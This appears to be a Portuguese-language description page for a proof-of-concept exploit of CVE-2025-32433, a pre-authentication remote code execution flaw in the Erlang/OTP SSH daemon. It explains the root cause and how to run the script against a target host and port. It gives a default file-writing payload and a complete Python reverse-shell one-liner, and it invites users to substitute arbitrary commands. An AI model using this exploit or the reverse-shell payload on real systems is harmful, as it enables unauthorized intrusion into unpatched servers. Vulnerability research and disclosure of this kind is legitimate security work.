
Exploit de prova de conceito para CVE-2025-32433, um RCE de pré-autenticação no daemon SSH do Erlang/OTP. Inclui script Python para enviar requisições de canal SSH manipuladas e executar comandos arbitrários.
O CVE-2025-32433 é uma vulnerabilidade de execução remota de código (RCE) que afeta o daemon SSH do Erlang/OTP.
A causa raiz é o tratamento inadequado de solicitações de canal SSH de pré-autenticação, que podem ser manipuladas por um atacante para
causar execução arbitrária de comandos antes da autenticação.
O PoC incluído demonstra o envio desses pacotes SSH manipulados; por padrão, ele escreve /lab.txt no alvo, mas pode ser adaptado para outros comandos.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
Por padrão, ele cria /lab.txt contendo "pwned".
Modifique o payload em build_channel_request para executar seus próprios comandos.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT manipulado para parecer um handshake normal.SSH_MSG_CHANNEL_OPEN e SSH_MSG_CHANNEL_REQUEST com um payload exec antes da autenticação.Descoberta e redação por Matt Keeley (Platform Security). Agradecemos a ele por publicar o PoC e compartilhar detalhes.
Link do blog: https://platformsecurity.com/blog/CVE-2025-32433-poc